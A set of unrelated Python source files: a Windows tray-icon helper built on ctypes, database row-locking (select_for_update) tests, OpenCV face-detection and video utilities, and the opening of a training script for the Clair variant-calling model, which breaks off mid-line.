[ctypes.wintypes.HWND, ctypes.POINTER(ctypes.wintypes.UINT)] class MSG(ctypes.Structure): _fields_ = [ ('HWND', ctypes.wintypes.HWND), ('message', ctypes.wintypes.UINT), ('wParam', ctypes.wintypes.WPARAM), ('lParam', ctypes.wintypes.LPARAM), ('time', ctypes.wintypes.DWORD), ('pt', POINT)] GetMessage = ctypes.windll.user32.GetMessageW GetMessage.restype = ctypes.wintypes.BOOL GetMessage.argtypes = [ctypes.POINTER(MSG), ctypes.wintypes.HWND, ctypes.wintypes.UINT, ctypes.wintypes.UINT] TranslateMessage = ctypes.windll.user32.TranslateMessage TranslateMessage.restype = ctypes.wintypes.ULONG TranslateMessage.argtypes = [ctypes.POINTER(MSG)] DispatchMessage = ctypes.windll.user32.DispatchMessageW DispatchMessage.restype = ctypes.wintypes.ULONG DispatchMessage.argtypes = [ctypes.POINTER(MSG)] def LoadIcon(iconfilename, small=False): return LoadImage(0, unicode(iconfilename), IMAGE_ICON, 16 if small else 0, 16 if small else 0, LR_LOADFROMFILE) class NotificationIcon(object): def __init__(self, iconfilename, tooltip=None): assert os.path.isfile(unicode(iconfilename)), "{} doesn't exist".format(iconfilename) self._iconfile = unicode(iconfilename) self._hicon = LoadIcon(self._iconfile, True) assert self._hicon, "Failed to load {}".format(iconfilename) #self._pumpqueue = Queue.Queue() self._die = False self._timerid = None self._uid = uuid.uuid4() self._tooltip = unicode(tooltip) if tooltip else u'' #self._thread = threading.Thread(target=self._run) #self._thread.start() self._info_bubble = None self.items = [] def _bubble(self, iconinfo): if self._info_bubble: info_bubble = self._info_bubble self._info_bubble = None message = unicode(self._info_bubble) iconinfo.uFlags |= NIF_INFO iconinfo.szInfo = message iconinfo.szInfoTitle = message iconinfo.dwInfoFlags = NIIF_INFO iconinfo.union.uTimeout = 10000 Shell_NotifyIcon(NIM_MODIFY, ctypes.pointer(iconinfo)) def _run(self): self.WM_TASKBARCREATED = ctypes.windll.user32.RegisterWindowMessageW(u'TaskbarCreated') self._windowproc = WNDPROC(self._callback) self._hwnd = GenerateDummyWindow(self._windowproc, str(self._uid)) iconinfo = NOTIFYICONDATA() iconinfo.hWnd = self._hwnd iconinfo.uID = 100 iconinfo.uFlags = NIF_ICON | NIF_SHOWTIP | NIF_MESSAGE | (NIF_TIP if self._tooltip else 0) iconinfo.uCallbackMessage = WM_MENUCOMMAND iconinfo.hIcon = self._hicon iconinfo.szTip = self._tooltip Shell_NotifyIcon(NIM_ADD, ctypes.pointer(iconinfo)) self.iconinfo = iconinfo PostMessage(self._hwnd, WM_NULL, 0, 0) message = MSG() last_time = -1 ret = None while not self._die: try: ret = GetMessage(ctypes.pointer(message), 0, 0, 0) TranslateMessage(ctypes.pointer(message)) DispatchMessage(ctypes.pointer(message)) except Exception, err: # print "NotificationIcon error", err, message message = MSG() time.sleep(0.125) print "Icon thread stopped, removing icon..." Shell_NotifyIcon(NIM_DELETE, ctypes.cast(ctypes.pointer(iconinfo), ctypes.POINTER(NOTIFYICONDATA))) ctypes.windll.user32.DestroyWindow(self._hwnd) ctypes.windll.user32.DestroyIcon(self._hicon) def _menu(self): if not hasattr(self, 'items'): return menu = CreatePopupMenu() func = None try: iidx = 1000 defaultitem = -1 item_map = {} for fs in self.items: iidx += 1 if isinstance(fs, basestring): if fs and not fs.strip('-_='): AppendMenu(menu, MF_SEPARATOR, iidx, fs) else: AppendMenu(menu, MF_STRING | MF_GRAYED, iidx, fs) elif isinstance(fs, tuple): if callable(fs[0]): itemstring = fs[0]() else: itemstring = unicode(fs[0]) flags = MF_STRING if itemstring.startswith("!"): itemstring = itemstring[1:] defaultitem = iidx if itemstring.startswith("+"): itemstring = itemstring[1:] flags = flags | MF_CHECKED itemcallable = fs[1] item_map[iidx] = itemcallable if itemcallable is False: flags = flags | MF_DISABLED elif not callable(itemcallable): flags = flags | MF_GRAYED AppendMenu(menu, flags, iidx, itemstring) if defaultitem != -1: SetMenuDefaultItem(menu, defaultitem, 0) pos = POINT() GetCursorPos(ctypes.pointer(pos)) PostMessage(self._hwnd, WM_NULL, 0, 0) SetForegroundWindow(self._hwnd) ti = TrackPopupMenu(menu, TPM_RIGHTBUTTON | TPM_RETURNCMD | TPM_NONOTIFY, pos.x, pos.y, 0, self._hwnd, None) if ti in item_map: func = item_map[ti] PostMessage(self._hwnd, WM_NULL, 0, 0) finally: DestroyMenu(menu) if func: func() def clicked(self): self._menu() def _callback(self, hWnd, msg, wParam, lParam): # Check if the main thread is still alive if msg == WM_TIMER: if not any(thread.getName() == 'MainThread' and thread.isAlive() for thread in threading.enumerate()): self._die = True elif msg == WM_MENUCOMMAND and lParam == WM_LBUTTONUP: self.clicked() elif msg == WM_MENUCOMMAND and lParam == WM_RBUTTONUP: self._menu() elif msg == self.WM_TASKBARCREATED: # Explorer restarted, add the icon again. Shell_NotifyIcon(NIM_ADD, ctypes.pointer(self.iconinfo)) else: return DefWindowProc(hWnd, msg, wParam, lParam) return 1 def die(self): self._die = True PostMessage(self._hwnd, WM_NULL, 0, 0) time.sleep(0.2) try: Shell_NotifyIcon(NIM_DELETE, self.iconinfo) except Exception, err: print "Icon remove error", err ctypes.windll.user32.DestroyWindow(self._hwnd) ctypes.windll.user32.DestroyIcon(self._hicon) def pump(self): try: while not self._pumpqueue.empty(): callable = self._pumpqueue.get(False) callable() except queue_Empty: pass def announce(self, text): self._info_bubble = text def hideConsole(): ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0) def showConsole(): ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1) def hasConsole(): return ctypes.windll.kernel32.GetConsoleWindow() != 0 if __name__ == "__main__": import time def greet(): ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0) print "Hello" def quit(): ni._die = True def announce(): ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 1) ni.announce("Hello there") def clicked(): ni.announce("Hello") def dynamicTitle(): return "!The time is: %s" % time.time() ni = NotificationIcon(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../trayicon.ico'), "SBTC 0.1.0") ni.items = [ (dynamicTitle, False), ('Hello', greet), ('Title', False), ('!Default', greet), ('+Popup bubble', announce), 'Nothing', '--', ('Quit', quit) ] ni.clicked = clicked import atexit @atexit.register def goodbye(): print "You are now leaving the Python sector." ni._run()
tests.py
import threading import time from unittest import mock from multiple_database.routers import TestRouter from djmodels.core.exceptions import FieldError from djmodels.db import ( DatabaseError, NotSupportedError, connection, connections, router, transaction, ) from djmodels.test import ( TransactionTestCase, override_settings, skipIfDBFeature, skipUnlessDBFeature, ) from djmodels.test.utils import CaptureQueriesContext from .models import City, Country, Person, PersonProfile class SelectForUpdateTests(TransactionTestCase): available_apps = ['select_for_update'] def setUp(self): # This is executed in autocommit mode so that code in # run_select_for_update can see this data. self.country1 = Country.objects.create(name='Belgium') self.country2 = Country.objects.create(name='France') self.city1 = City.objects.create(name='Liberchies', country=self.country1) self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2) self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2) self.person_profile = PersonProfile.objects.create(person=self.person) # We need another database connection in transaction to test that one # connection issuing a SELECT ... FOR UPDATE will block. self.new_connection = connection.copy() def tearDown(self): try: self.end_blocking_transaction() except (DatabaseError, AttributeError): pass self.new_connection.close() def start_blocking_transaction(self): self.new_connection.set_autocommit(False) # Start a blocking transaction. At some point, # end_blocking_transaction() should be called. self.cursor = self.new_connection.cursor() sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % { 'db_table': Person._meta.db_table, 'for_update': self.new_connection.ops.for_update_sql(), } self.cursor.execute(sql, ()) self.cursor.fetchone() def end_blocking_transaction(self): # Roll back the blocking transaction. self.cursor.close() self.new_connection.rollback() self.new_connection.set_autocommit(True) def has_for_update_sql(self, queries, **kwargs): # Examine the SQL that was executed to determine whether it # contains the 'SELECT..FOR UPDATE' stanza. for_update_sql = connection.ops.for_update_sql(**kwargs) return any(for_update_sql in query['sql'] for query in queries) @skipUnlessDBFeature('has_select_for_update') def test_for_update_sql_generated(self): """ The backend's FOR UPDATE variant appears in generated SQL when select_for_update is invoked. """ with transaction.atomic(), CaptureQueriesContext(connection) as ctx: list(Person.objects.all().select_for_update()) self.assertTrue(self.has_for_update_sql(ctx.captured_queries)) @skipUnlessDBFeature('has_select_for_update_nowait') def test_for_update_sql_generated_nowait(self): """ The backend's FOR UPDATE NOWAIT variant appears in generated SQL when select_for_update is invoked. """ with transaction.atomic(), CaptureQueriesContext(connection) as ctx: list(Person.objects.all().select_for_update(nowait=True)) self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True)) @skipUnlessDBFeature('has_select_for_update_skip_locked') def test_for_update_sql_generated_skip_locked(self): """ The backend's FOR UPDATE SKIP LOCKED variant appears in generated SQL when select_for_update is invoked. """ with transaction.atomic(), CaptureQueriesContext(connection) as ctx: list(Person.objects.all().select_for_update(skip_locked=True)) self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True)) @skipUnlessDBFeature('has_select_for_update_of') def test_for_update_sql_generated_of(self): """ The backend's FOR UPDATE OF variant appears in the generated SQL when select_for_update() is invoked. """ with transaction.atomic(), CaptureQueriesContext(connection) as ctx: list(Person.objects.select_related( 'born__country', ).select_for_update( of=('born__country',), ).select_for_update( of=('self', 'born__country') )) features = connections['default'].features if features.select_for_update_of_column: expected = ['"select_for_update_person"."id"', '"select_for_update_country"."id"'] else: expected = ['"select_for_update_person"', '"select_for_update_country"'] if features.uppercases_column_names: expected = [value.upper() for value in expected] self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected)) @skipUnlessDBFeature('has_select_for_update_of') def test_for_update_of_followed_by_values(self): with transaction.atomic(): values = list(Person.objects.select_for_update(of=('self',)).values('pk')) self.assertEqual(values, [{'pk': self.person.pk}]) @skipUnlessDBFeature('has_select_for_update_of') def test_for_update_of_followed_by_values_list(self): with transaction.atomic(): values = list(Person.objects.select_for_update(of=('self',)).values_list('pk')) self.assertEqual(values, [(self.person.pk,)]) @skipUnlessDBFeature('has_select_for_update_of') def test_for_update_of_self_when_self_is_not_selected(self): """ select_for_update(of=['self']) when the only columns selected are from related tables. """ with transaction.atomic(): values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name')) self.assertEqual(values, [{'born__name': self.city1.name}]) @skipUnlessDBFeature('has_select_for_update_nowait') def test_nowait_raises_error_on_block(self): """ If nowait is specified, we expect an error to be raised rather than blocking. """ self.start_blocking_transaction() status = [] thread = threading.Thread( target=self.run_select_for_update, args=(status,), kwargs={'nowait': True}, ) thread.start() time.sleep(1) thread.join() self.end_blocking_transaction() self.assertIsInstance(status[-1], DatabaseError) @skipUnlessDBFeature('has_select_for_update_skip_locked') def test_skip_locked_skips_locked_rows(self): """ If skip_locked is specified, the locked row is skipped resulting in Person.DoesNotExist. """ self.start_blocking_transaction() status = [] thread = threading.Thread( target=self.run_select_for_update, args=(status,), kwargs={'skip_locked': True}, ) thread.start() time.sleep(1) thread.join() self.end_blocking_transaction() self.assertIsInstance(status[-1], Person.DoesNotExist) @skipIfDBFeature('has_select_for_update_nowait') @skipUnlessDBFeature('has_select_for_update') def test_unsupported_nowait_raises_error(self): """ NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on a database backend that supports FOR UPDATE but not NOWAIT. """ with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'): with transaction.atomic(): Person.objects.select_for_update(nowait=True).get() @skipIfDBFeature('has_select_for_update_skip_locked') @skipUnlessDBFeature('has_select_for_update') def test_unsupported_skip_locked_raises_error(self): """ NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run on a database backend that supports FOR UPDATE but not SKIP LOCKED. """ with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'): with transaction.atomic(): Person.objects.select_for_update(skip_locked=True).get() @skipIfDBFeature('has_select_for_update_of') @skipUnlessDBFeature('has_select_for_update') def test_unsupported_of_raises_error(self): """ NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on a database backend that supports FOR UPDATE but not OF. """ msg = 'FOR UPDATE OF is not supported on this database backend.' with self.assertRaisesMessage(NotSupportedError, msg): with transaction.atomic(): Person.objects.select_for_update(of=('self',)).get() @skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of') def test_unrelated_of_argument_raises_error(self): """ FieldError is raised if a non-relation field is specified in of=(...). """ msg = ( 'Invalid field name(s) given in select_for_update(of=(...)): %s. ' 'Only relational fields followed in the query are allowed. ' 'Choices are: self, born, born__country.' ) invalid_of = [ ('nonexistent',), ('name',), ('born__nonexistent',), ('born__name',), ('born__nonexistent', 'born__name'), ] for of in invalid_of: with self.subTest(of=of): with self.assertRaisesMessage(FieldError, msg % ', '.join(of)): with transaction.atomic(): Person.objects.select_related('born__country').select_for_update(of=of).get() @skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of') def test_related_but_unselected_of_argument_raises_error(self): """ FieldError is raised if a relation field that is not followed in the query is specified in of=(...). """ msg = ( 'Invalid field name(s) given in select_for_update(of=(...)): %s. ' 'Only relational fields followed in the query are allowed. ' 'Choices are: self, born, profile.' ) for name in ['born__country', 'died', 'died__country']: with self.subTest(name=name): with self.assertRaisesMessage(FieldError, msg % name): with transaction.atomic(): Person.objects.select_related( 'born', 'profile', ).exclude(profile=None).select_for_update(of=(name,)).get() @skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of') def test_reverse_one_to_one_of_arguments(self): """ Reverse OneToOneFields may be included in of=(...) as long as NULLs are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE. """ with transaction.atomic(): person = Person.objects.select_related( 'profile', ).exclude(profile=None).select_for_update(of=('profile',)).get() self.assertEqual(person.profile, self.person_profile) @skipUnlessDBFeature('has_select_for_update') def test_for_update_after_from(self): features_class = connections['default'].features.__class__ attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__) with mock.patch(attribute_to_patch, return_value=True): with transaction.atomic(): self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query)) @skipUnlessDBFeature('has_select_for_update') def test_for_update_requires_transaction(self): """ A TransactionManagementError is raised when a select_for_update query is executed outside of a transaction. """ msg = 'select_for_update cannot be used outside of a transaction.' with self.assertRaisesMessage(transaction.TransactionManagementError, msg): list(Person.objects.all().select_for_update()) @skipUnlessDBFeature('has_select_for_update') def test_for_update_requires_transaction_only_in_execution(self): """ No TransactionManagementError is raised when select_for_update is invoked outside of a transaction - only when the query is executed. """ people = Person.objects.all().select_for_update() msg = 'select_for_update cannot be used outside of a transaction.' with self.assertRaisesMessage(transaction.TransactionManagementError, msg): list(people) @skipUnlessDBFeature('supports_select_for_update_with_limit') def test_select_for_update_with_limit(self): other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2) with transaction.atomic(): qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2]) self.assertEqual(qs[0], other) @skipIfDBFeature('supports_select_for_update_with_limit') def test_unsupported_select_for_update_with_limit(self): msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.' with self.assertRaisesMessage(NotSupportedError, msg): with transaction.atomic(): list(Person.objects.all().order_by('pk').select_for_update()[1:2]) def run_select_for_update(self, status, **kwargs): """ Utility method that runs a SELECT FOR UPDATE against all Person instances. After the select_for_update, it attempts to update the name of the only record, save, and commit. This function expects to run in a separate thread. """ status.append('started') try: # We need to enter transaction management again, as this is done on # per-thread basis with transaction.atomic(): person = Person.objects.select_for_update(**kwargs).get() person.name = 'Fred' person.save() except (DatabaseError, Person.DoesNotExist) as e: status.append(e) finally: # This method is run in a separate thread. It uses its own # database connection. Close it without waiting for the GC. connection.close() @skipUnlessDBFeature('has_select_for_update') @skipUnlessDBFeature('supports_transactions') def test_block(self): """ A thread running a select_for_update that accesses rows being touched by a similar operation on another connection blocks correctly. """ # First, let's start the transaction in our thread. self.start_blocking_transaction() # Now, try it again using the ORM's select_for_update # facility. Do this in a separate thread. status = [] thread = threading.Thread( target=self.run_select_for_update, args=(status,) ) # The thread should immediately block, but we'll sleep # for a bit to make sure. thread.start() sanity_count = 0 while len(status) != 1 and sanity_count < 10: sanity_count += 1 time.sleep(1) if sanity_count >= 10: raise ValueError('Thread did not run and block') # Check the person hasn't been updated. Since this isn't # using FOR UPDATE, it won't block. p = Person.objects.get(pk=self.person.pk) self.assertEqual('Reinhardt', p.name) # When we end our blocking transaction, our thread should # be able to continue. self.end_blocking_transaction() thread.join(5.0) # Check the thread has finished. Assuming it has, we should # find that it has updated the person's name. self.assertFalse(thread.isAlive()) # We must commit the transaction to ensure that MySQL gets a fresh read, # since by default it runs in REPEATABLE READ mode transaction.commit() p = Person.objects.get(pk=self.person.pk) self.assertEqual('Fred', p.name) @skipUnlessDBFeature('has_select_for_update') def test_raw_lock_not_available(self): """ Running a raw query which can't obtain a FOR UPDATE lock raises the correct exception """ self.start_blocking_transaction() def raw(status): try: list( Person.objects.raw( 'SELECT * FROM %s %s' % ( Person._meta.db_table, connection.ops.for_update_sql(nowait=True) ) ) ) except DatabaseError as e: status.append(e) finally: # This method is run in a separate thread. It uses its own # database connection. Close it without waiting for the GC. # Connection cannot be closed on Oracle because cursor is still # open. if connection.vendor != 'oracle': connection.close() status = [] thread = threading.Thread(target=raw, kwargs={'status': status}) thread.start() time.sleep(1) thread.join() self.end_blocking_transaction() self.assertIsInstance(status[-1], DatabaseError) @skipUnlessDBFeature('has_select_for_update') @override_settings(DATABASE_ROUTERS=[TestRouter()]) def test_select_for_update_on_multidb(self): query = Person.objects.select_for_update() self.assertEqual(router.db_for_write(Person), query.db) @skipUnlessDBFeature('has_select_for_update') def test_select_for_update_with_get(self): with transaction.atomic(): person = Person.objects.select_for_update().get(name='Reinhardt') self.assertEqual(person.name, 'Reinhardt') def test_nowait_and_skip_locked(self): with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'): Person.objects.select_for_update(nowait=True, skip_locked=True) def test_ordered_select_for_update(self): """ Subqueries should respect ordering as an ORDER BY clause may be useful to specify a row locking order to prevent deadlocks (#27193). """ with transaction.atomic(): qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update()) self.assertIn('ORDER BY', str(qs.query))
opencv_utilities.py
import ntpath from threading import Thread import cv2 as cv import numpy as np import definitions def getFaceFromImage(image): if isinstance(image, str): img = cv.imread(image) else: img = image gray_img = cv.cvtColor(img, cv.COLOR_BGR2GRAY) haar_classifier = cv.CascadeClassifier('/home/manoolia/anaconda3/envs/axonpy/lib/python3.6/site-packages/cv2/data/haarcascade_frontalface_alt2.xml') faces = haar_classifier.detectMultiScale(gray_img, scaleFactor=1.1, minNeighbors=5) return faces def getFileNameFromPath(fileName): ntpath.basename(definitions.ROOT_DIR + "/outputs/") head, tail = ntpath.split(fileName) return tail def writeImageText(image, text): font = cv.FONT_HERSHEY_SIMPLEX # get boundary of this text textsize = cv.getTextSize(text, font, 1, 2)[0] # get coords based on boundary textX = (image.shape[1] - textsize[0]) // 2 textY = (image.shape[0] + textsize[1]) // 2 + (image.shape[0] // 2 - 20) # add text centered on image cv.putText( image, text, (textX, textY), font, 1, (0, 0, 255), 3 ) return image def write_bb_image(boxes, labels, width_scale, height_scale, image, classes): if len(boxes) > 0: for (left, top, right, bottom), label in zip(boxes, labels): left = int(left * width_scale) top = int(top * height_scale) right = int(right * width_scale) bottom = int(bottom * height_scale) cv.rectangle(image, (left, top), (right, bottom), color=(255, 0, 0), thickness=3) cv.putText( image, classes[label], (left, top - 10), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0) ) return image class VideoGet: """ Class that continuously gets frames from a VideoCapture object with a dedicated thread. """ def __init__(self, src=0): self.stream = cv.VideoCapture(src) (self.grabbed, self.frame) = self.stream.read() self.stopped = False self.video_show = VideoShow(self.frame).start() def start(self): Thread(target=self.get, args=()).start() return self def get(self): while not self.stopped: if not self.grabbed: self.stop() else: (self.grabbed, self.frame) = self.stream.read() self.video_show.frame = self.frame def stop(self): self.stopped = True class VideoShow: """ Class that continuously shows a frame using a dedicated thread. """ def __init__(self, frame=None): self.frame = frame self.stopped = False def start(self): Thread(target=self.show, args=()).start() return self def show(self): while not self.stopped: cv.imshow("Video", self.frame) if cv.waitKey(1) == ord("q"): self.stopped = True def stop(self): self.stopped = True
train.py
import sys import os import logging import random import numpy as np from time import time from argparse import ArgumentParser from threading import Thread from clair.model import Clair import clair.utils as utils import clair.evaluate as evaluate import shared.param as param logging.basicConfig(format='%(message)s', level=logging.INFO) def is_last_five_epoch_approaches_minimum(validation_losses): if len(validation_losses) <= 5: return True minimum_validation_loss = min(np.asarray(validation_losses)[:, 0]) return ( validation_losses[-5][0] == minimum_validation_loss or validation_losses[-4][0] == minimum_validation_loss or validation_losses[-3][0] == minimum_validation_loss or validation_losses[-2][0] == minimum_validation_loss or validation_losses[-1][0] == minimum_validation_loss ) def is_validation_loss_goes_up_and_down(validation_losses): if len(validation_losses) <= 6: return False return ( validation_losses[-6][0] > validation_losses[-5][0] and validation_losses[-5][0] < validation_losses[-4][0] and validation_losses[-4][0] > validation_losses[-3][0] and validation_losses[-3][0] < validation_losses[-2][0] and validation_losses[-2][0] > validation_losses[-1][0] ) or ( validation_losses[-6][0] < validation_losses[-5][0] and validation_losses[-5][0] > validation_losses[-4][0] and validation_losses[-4][0] < validation_losses[-3][0] and validation_losses[-3][0] > validation_losses[-2][0] and validation_losses[-2][0] < validation_losses[-1][0] ) def is_validation_losses_keep_increasing(validation_losses): if len(validation_losses) <= 6: return False minimum_validation_loss = min(np.asarray(validation_losses)[:, 0]) return ( validation_losses[-5][0] > minimum_validation_loss and validation_losses[-4][0] > minimum_validation_loss and validation_losses[-3][0] > minimum_validation_loss and validation_losses[-2][0] > minimum_validation_loss and validation_losses[-1][0] > minimum_validation_loss ) def shuffle_first_n_items(array, n): """ Shuffle first n items on given array. """ if len(array) <= n: np.random.shuffle(array) return array # pylint: disable=unbalanced-tuple-unpacking a1, a2 = np.split(array, [n]) np.random.shuffle(a1) return np.append(a1, a2) def train_model(m, training_config): learning_rate = training_config.learning_rate l2_regularization_lambda = training_config.l2_regularization_lambda output_file_path_prefix = training_config.output_file_path_prefix summary_writer = training_config.summary_writer model_initalization_file_path = training_config.model_initalization_file_path dataset_info = training_config.dataset_info dataset_size = dataset_info.dataset_size training_losses = [] validation_losses = [] if model_initalization_file_path is not None: m.restore_parameters(os.path.abspath(model_initalization_file_path)) logging.info("[INFO] Start training...") logging.info("[INFO] Learning rate: %.2e" % m.set_learning_rate(learning_rate)) logging.info("[INFO] L2 regularization lambda: %.2e" % m.set_l2_regularization_lambda(l2_regularization_lambda)) # Model Constants training_start_time = time() learning_rate_switch_count = param.maxLearningRateSwitch no_of_training_examples = ( dataset_info.no_of_training_examples_from_train_binary or int(dataset_size * param.trainingDatasetPercentage) ) no_of_validation_examples = dataset_info.dataset_size - no_of_training_examples no_of_blosc_blocks = utils.no_of_blosc_blocks_from( dataset_info=dataset_info, no_of_training_examples=no_of_training_examples, blosc_block_size=param.bloscBlockSize ) no_of_training_blosc_blocks = int(no_of_training_examples / param.bloscBlockSize) tensor_block_index_list = np.arange(no_of_blosc_blocks, dtype=int) # Initialize variables epoch_count = 1 if model_initalization_file_path is not None: epoch_count = int(model_initalization_file_path[-param.parameterOutputPlaceHolder:]) + 1 epoch_start_time = time() training_loss_sum = 0 validation_loss_sum = 0 no_of_epochs_with_current_learning_rate = 0 # Variables for learning rate decay data_index = 0 blosc_index = 0 first_blosc_block_data_index = 0 x_batch = None y_batch = None gt21_loss_sum = 0 genotype_loss_sum = 0 indel_length_loss_sum_1 = 0 indel_length_loss_sum_2 = 0 l2_loss_sum = 0 while True: is_training = data_index < no_of_training_examples is_validation = not is_training is_with_batch_data = x_batch is not None and y_batch is not None # logging.info("{} {} {} {} {}".format("TRAIN" if is_training else "VALID", data_index, first_blosc_block_data_index, blosc_index, no_of_training_examples)) # threads for either train or validation thread_pool = [] if is_with_batch_data and is_training: thread_pool.append(Thread(target=m.train, args=(x_batch, y_batch))) elif is_with_batch_data and is_validation: thread_pool.append(Thread(target=m.validate, args=(x_batch, y_batch))) for t in thread_pool: t.start() next_x_batch, next_y_batch, next_first_blosc_block_data_index, next_blosc_start_index = utils.new_mini_batch( data_index=data_index, blosc_start_index=blosc_index, first_blosc_block_data_index=first_blosc_block_data_index, no_of_training_examples=no_of_training_examples, no_of_blosc_blocks=no_of_blosc_blocks, dataset_info=dataset_info, tensor_block_index_list=tensor_block_index_list, ) # wait until loaded next mini batch & finished training/validation with current mini batch for t in thread_pool: t.join() # add training loss or validation loss if is_with_batch_data and is_training: training_loss_sum += m.training_loss_on_one_batch if summary_writer is not None: summary = m.training_summary_on_one_batch summary_writer.add_summary(summary, epoch_count) elif is_with_batch_data and is_validation: validation_loss_sum += m.validation_loss_on_one_batch gt21_loss_sum += m.gt21_loss genotype_loss_sum += m.genotype_loss indel_length_loss_sum_1 += m.indel_length_loss_1 indel_length_loss_sum_2 += m.indel_length_loss_2 l2_loss_sum += m.l2_loss batch_size = np.shape(next_x_batch)[0] data_index += batch_size blosc_index = next_blosc_start_index first_blosc_block_data_index = next_first_blosc_block_data_index # if not go through whole dataset yet, continue the process if next_first_blosc_block_data_index >= 0 and next_blosc_start_index >= 0: x_batch = next_x_batch y_batch = next_y_batch continue # logging.info("{} {} {} {} {}".format("END", data_index, first_blosc_block_data_index, blosc_index, no_of_training_examples)) logging.info( " ".join([str(epoch_count), "Training loss:", str(training_loss_sum/no_of_training_examples)]) ) logging.info( "\t".join([ "{} Validation loss (Total/Base/Genotype/Indel_1_2):".format(epoch_count), str(validation_loss_sum/no_of_validation_examples), str(gt21_loss_sum/no_of_validation_examples), str(genotype_loss_sum/no_of_validation_examples), str(indel_length_loss_sum_1/no_of_validation_examples), str(indel_length_loss_sum_2/no_of_validation_examples) ]) ) logging.info("[INFO] Epoch time elapsed: %.2f s" % (time() - epoch_start_time)) training_losses.append((training_loss_sum, epoch_count)) validation_losses.append((validation_loss_sum, epoch_count)) # Output the model if output_file_path_prefix is not None: parameter_output_path = "%s-%%0%dd" % (output_file_path_prefix, param.parameterOutputPlaceHolder) m.save_parameters(os.path.abspath(parameter_output_path % epoch_count)) # Adaptive learning rate decay no_of_epochs_with_current_learning_rate += 1 need_learning_rate_update = ( ( no_of_epochs_with_current_learning_rate >= 6 and not is_last_five_epoch_approaches_minimum(validation_losses) and is_validation_loss_goes_up_and_down(validation_losses) ) or ( no_of_epochs_with_current_learning_rate >= 8 and is_validation_losses_keep_increasing(validation_losses) ) ) if need_learning_rate_update: learning_rate_switch_count -= 1 if learning_rate_switch_count == 0: break logging.info("[INFO] New learning rate: %.2e" % m.decay_learning_rate()) logging.info("[INFO] New L2 regularization lambda: %.2e" % m.decay_l2_regularization_lambda()) no_of_epochs_with_current_learning_rate = 0 # variables update per epoch epoch_count += 1 epoch_start_time = time() training_loss_sum = 0 validation_loss_sum = 0 data_index = 0 blosc_index = 0 first_blosc_block_data_index = 0 x_batch = None y_batch = None gt21_loss_sum = 0 genotype_loss_sum = 0 indel_length_loss_sum_1 = 0 indel_length_loss_sum_2 = 0 l2_loss_sum = 0 # shuffle data on each epoch tensor_block_index_list = shuffle_first_n_items(tensor_block_index_list, no_of_training_blosc_blocks) logging.info("[INFO] Shuffled: " + ' '.join( [str(x) for x in np.append(tensor_block_index_list[:5], tensor_block_index_list[-5:])] )) logging.info("[INFO] Training time elapsed: %.2f s" % (time() - training_start_time)) return training_losses, validation_losses def main(): random.seed(param.RANDOM_SEED) np.random.seed(param.RANDOM_SEED) parser = ArgumentParser(description="Train model") # optimizer parser.add_argument('--SGDM', action='store_true', help="Use Stochastic Gradient Descent with momentum as optimizer") parser.add_argument('--Adam', action='store_true', help="Use Adam as optimizer") # loss function parser.add_argument('--cross_entropy', action='store_true', help="Use Cross Entropy as loss function") parser.add_argument('--focal_loss', action='store_true', help="Use Focal Loss as loss function") # binary file path parser.add_argument('--bin_fn', type=str, default=None, help="Binary tensor input generated by tensor2Bin.py, tensor_fn, var_fn and bed_fn will be ignored") parser.add_argument('--train_bin_fn', type=str, default=None, help="Train Binary, used together with --validation_bin_fn (would ignore: bin_fn, tensor_fn, var_fn, bed_fn)") parser.add_argument('--validation_bin_fn', type=str, default=None, help="Validation Binary, used together with --train_bin_fn (would ignore: bin_fn, tensor_fn, var_fn, bed_fn)") # tensor file path parser.add_argument('--tensor_fn', type=str, default="vartensors", help="Tensor input") # variant file path parser.add_argument('--var_fn', type=str, default="truthvars", help="Truth variants list input") # bed file path parser.add_argument('--bed_fn', type=str, default=None, help="High confident genome regions input in the BED format") # checkpoint file path parser.add_argument('--chkpnt_fn', type=str, default=None, help="Input a checkpoint for testing or continue training") # learning rate, with default value stated in param parser.add_argument('--learning_rate', type=float, default=param.initialLearningRate, help="Set the initial learning rate, default: %(default)s") # l2 regularization parser.add_argument('--lambd', type=float, default=param.l2RegularizationLambda, help="Set the l2 regularization lambda, default: %(default)s") # output checkpint file path prefix parser.add_argument('--ochk_prefix', type=str, default=None, help="Prefix for checkpoint outputs at each learning rate change, REQUIRED") parser.add_argument('--olog_dir', type=str, default=None, help="Directory for tensorboard log outputs, optional") args = parser.parse_args() if len(sys.argv[1:]) == 0: parser.print_help() sys.exit(1) # initialize logging.info("[INFO] Initializing") utils.setup_environment() optimizer = "SGDM" if args.SGDM else ("Adam" if args.Adam else param.default_optimizer) loss_function = ( "FocalLoss" if args.focal_loss else ("CrossEntropy" if args.cross_entropy else param.default_loss_function) ) logging.info("[INFO] 